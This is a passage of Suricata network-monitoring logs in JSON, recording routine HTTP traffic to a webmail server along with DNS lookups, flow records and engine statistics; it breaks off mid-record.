{"timestamp":"2020-02-29T00:06:57.151550+0000","flow_id":2199893709972968,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34754,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6131}} {"timestamp":"2020-02-29T00:06:59.002238+0000","flow_id":2074880077357107,"event_type":"flow","src_ip":"192.168.10.122","src_port":56903,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:01:58.221235+0000","end":"2020-02-29T00:01:58.332439+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:06:59.155554+0000","flow_id":117556125411825,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34752,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/turba\/add.php","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":19005},"app_proto":"http","fileinfo":{"filename":"\/turba\/add.php","state":"TRUNCATED","stored":false,"size":106496,"tx_id":1}} {"timestamp":"2020-02-29T00:07:00.000186+0000","event_type":"stats","stats":{"uptime":14072,"capture":{"kernel_packets":133702,"kernel_drops":0},"decoder":{"pkts":133714,"bytes":92495080,"invalid":181,"ipv4":132257,"ipv6":8,"ethernet":133714,"raw":0,"null":0,"sll":0,"tcp":127141,"udp":4920,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":691,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7096480},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2711,"ssn_memcap_drop":0,"pseudo":340,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2727,"synack":2718,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":139,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1754,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2244,"failed_udp":110},"tx":{"http":4541,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2321}},"flow_mgr":{"closed_pruned":2693,"new_pruned":15,"est_pruned":2288,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":21165,"memcap_state":0,"memcap_global":0},"http":{"memuse":188825,"memcap":0}}} {"timestamp":"2020-02-29T00:07:00.231216+0000","flow_id":2199893709972968,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34754,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6131},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":30702,"tx_id":0}} {"timestamp":"2020-02-29T00:07:00.242351+0000","flow_id":339717604553391,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":55353,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":12284,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:07:00.351112+0000","flow_id":339717604553391,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":55353,"proto":"UDP","dns":{"type":"answer","id":12284,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:07:00.351112+0000","flow_id":339717604553391,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":55353,"proto":"UDP","dns":{"type":"answer","id":12284,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:07:00.421380+0000","flow_id":2199893709972968,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34754,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/imp\/dynamic.php?page=mailbox","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8383}} {"timestamp":"2020-02-29T00:07:00.708831+0000","flow_id":2199893709972968,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34754,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/dynamic.php?page=mailbox","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8383},"app_proto":"http","fileinfo":{"filename":"\/imp\/dynamic.php","state":"CLOSED","stored":false,"size":35100,"tx_id":1}} {"timestamp":"2020-02-29T00:07:00.719517+0000","flow_id":463232274070173,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":40239,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":6681,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:07:00.828093+0000","flow_id":463232274070173,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":40239,"proto":"UDP","dns":{"type":"answer","id":6681,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:07:00.828093+0000","flow_id":463232274070173,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":40239,"proto":"UDP","dns":{"type":"answer","id":6681,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:07:00.886477+0000","flow_id":2199893709972968,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34754,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/dynamicInit","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":885},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/dynamicInit","state":"CLOSED","stored":false,"size":173,"tx_id":2}} {"timestamp":"2020-02-29T00:07:00.886498+0000","flow_id":2199893709972968,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34754,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/dynamicInit","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":905}} {"timestamp":"2020-02-29T00:07:02.000817+0000","flow_id":1373619292299151,"event_type":"flow","src_ip":"192.168.10.122","src_port":34201,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:02:01.614287+0000","end":"2020-02-29T00:02:01.726419+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:07:02.000980+0000","flow_id":1385872834029786,"event_type":"flow","src_ip":"192.168.10.122","src_port":41614,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:02:01.583898+0000","end":"2020-02-29T00:02:01.695422+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:07:03.000661+0000","flow_id":1224077136164186,"event_type":"flow","src_ip":"192.168.10.81","src_port":52690,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":10,"pkts_toclient":13,"bytes_toserver":2729,"bytes_toclient":7411,"start":"2020-02-29T00:05:52.587098+0000","end":"2020-02-29T00:06:02.061403+0000","age":10,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:07:03.001362+0000","flow_id":2245411754145674,"event_type":"flow","src_ip":"192.168.10.122","src_port":56001,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:02:02.063370+0000","end":"2020-02-29T00:02:02.174799+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:07:05.000870+0000","flow_id":1667395055547594,"event_type":"flow","src_ip":"192.168.10.122","src_port":59842,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:02:04.750794+0000","end":"2020-02-29T00:02:04.861699+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:07:05.888042+0000","flow_id":2199893709972968,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34754,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/dynamicInit","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":905},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/dynamicInit","state":"CLOSED","stored":false,"size":2334,"tx_id":2}} {"timestamp":"2020-02-29T00:07:06.000423+0000","flow_id":69813250355827,"event_type":"flow","src_ip":"192.168.10.122","src_port":45990,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:02:04.979571+0000","end":"2020-02-29T00:02:05.090880+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:07:07.000175+0000","event_type":"stats","stats":{"uptime":14079,"capture":{"kernel_packets":133719,"kernel_drops":0},"decoder":{"pkts":133739,"bytes":92508417,"invalid":181,"ipv4":132282,"ipv6":8,"ethernet":133739,"raw":0,"null":0,"sll":0,"tcp":127162,"udp":4924,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":691,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7095328},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2711,"ssn_memcap_drop":0,"pseudo":340,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2727,"synack":2718,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":139,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1754,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2246,"failed_udp":110},"tx":{"http":4543,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2323}},"flow_mgr":{"closed_pruned":2694,"new_pruned":15,"est_pruned":2292,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":20174,"memcap_state":0,"memcap_global":0},"http":{"memuse":137002,"memcap":0}}} {"timestamp":"2020-02-29T00:07:08.048471+0000","flow_id":782648992382295,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":48718,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":61304,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:07:08.157035+0000","flow_id":782648992382295,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":48718,"proto":"UDP","dns":{"type":"answer","id":61304,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:07:08.157035+0000","flow_id":782648992382295,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":48718,"proto":"UDP","dns":{"type":"answer","id":61304,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:07:08.234197+0000","flow_id":322507671114127,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34756,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/turba\/add.php","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/add.php","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"http:\/\/mail.spiral.com\/turba\/contact.php?source=dDQI2mfGX-cQemxh4GC5uHK&key=E4CyMdGf1_ahUkbupqNOwDc&view=Contact","length":20}} {"timestamp":"2020-02-29T00:07:08.241765+0000","flow_id":20416851390565,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":49564,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":35492,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:07:08.350330+0000","flow_id":20416851390565,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49564,"proto":"UDP","dns":{"type":"answer","id":35492,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:07:08.350330+0000","flow_id":20416851390565,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49564,"proto":"UDP","dns":{"type":"answer","id":35492,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:07:11.433029+0000","flow_id":174022061955973,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":57163,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":20847,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:07:11.541143+0000","flow_id":174022061955973,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":57163,"proto":"UDP","dns":{"type":"answer","id":20847,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:07:11.541143+0000","flow_id":174022061955973,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":57163,"proto":"UDP","dns":{"type":"answer","id":20847,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:07:11.614596+0000","flow_id":285025491706982,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34758,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/viewPort","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":360}} {"timestamp":"2020-02-29T00:07:11.614596+0000","flow_id":285025491706982,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34758,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/viewPort","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":360},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/viewPort","state":"CLOSED","stored":false,"size":240,"tx_id":0}} {"timestamp":"2020-02-29T00:07:13.001742+0000","flow_id":1646985371396187,"event_type":"flow","src_ip":"192.168.10.122","src_port":52256,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:02:11.927835+0000","end":"2020-02-29T00:02:12.039358+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:07:14.000393+0000","event_type":"stats","stats":{"uptime":14086,"capture":{"kernel_packets":133750,"kernel_drops":0},"decoder":{"pkts":133793,"bytes":92539822,"invalid":183,"ipv4":132336,"ipv6":8,"ethernet":133793,"raw":0,"null":0,"sll":0,"tcp":127208,"udp":4930,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":691,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7096480},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2713,"ssn_memcap_drop":0,"pseudo":340,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2729,"synack":2720,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":140,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1756,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2249,"failed_udp":110},"tx":{"http":4545,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2326}},"flow_mgr":{"closed_pruned":2694,"new_pruned":15,"est_pruned":2294,"bypassed_pruned":0,"flows_checked":3,"flows_notimeout":3,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65533,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":20837,"memcap_state":0,"memcap_global":0},"http":{"memuse":41230,"memcap":0}}} {"timestamp":"2020-02-29T00:07:16.000296+0000","flow_id":1288304062889383,"event_type":"flow","src_ip":"192.168.10.122","src_port":41386,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:02:15.196007+0000","end":"2020-02-29T00:02:15.307685+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:07:16.615624+0000","flow_id":285025491706982,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34758,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/viewPort","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":360},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/viewPort","state":"CLOSED","stored":false,"size":613,"tx_id":0}} {"timestamp":"2020-02-29T00:07:20.223330+0000","flow_id":1599723571538018,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":58451,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":35085,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:07:20.332082+0000","flow_id":1599723571538018,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":58451,"proto":"UDP","dns":{"type":"answer","id":35085,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:07:20.332082+0000","flow_id":1599723571538018,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":58451,"proto":"UDP","dns":{"type":"answer","id":35085,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:07:20.401062+0000","flow_id":1214181537235511,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52696,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php?actionID=add_memo","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5750}} {"timestamp":"2020-02-29T00:07:21.000157+0000","event_type":"stats","stats":{"uptime":14093,"capture":{"kernel_packets":133797,"kernel_drops":0},"decoder":{"pkts":133800,"bytes":92540236,"invalid":183,"ipv4":132341,"ipv6":8,"ethernet":133800,"raw":0,"null":0,"sll":0,"tcp":127213,"udp":4930,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":691,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7096192},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2713,"ssn_memcap_drop":0,"pseudo":340,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2729,"synack":2720,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":140,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1756,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2249,"failed_udp":110},"tx":{"http":4545,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2326}},"flow_mgr":{"closed_pruned":2694,"new_pruned":15,"est_pruned":2296,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":20837,"memcap_state":0,"memcap_global":0},"http":{"memuse":53911,"memcap":0}}} {"timestamp":"2020-02-29T00:07:24.001722+0000","flow_id":936726630439456,"event_type":"flow","src_ip":"192.168.10.122","src_port":43411,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:02:23.858656+0000","end":"2020-02-29T00:02:23.964468+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:07:25.401776+0000","flow_id":1214181537235511,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52696,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php?actionID=add_memo","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5750},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/memo.php","state":"CLOSED","stored":false,"size":22300,"tx_id":0}} {"timestamp":"2020-02-29T00:07:28.000450+0000","event_type":"stats","stats":{"uptime":14100,"capture":{"kernel_packets":133819,"kernel_drops":0},"decoder":{"pkts":133822,"bytes":92548413,"invalid":183,"ipv4":132363,"ipv6":8,"ethernet":133822,"raw":0,"null":0,"sll":0,"tcp":127233,"udp":4932,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":691,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7096480},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2714,"ssn_memcap_drop":0,"ps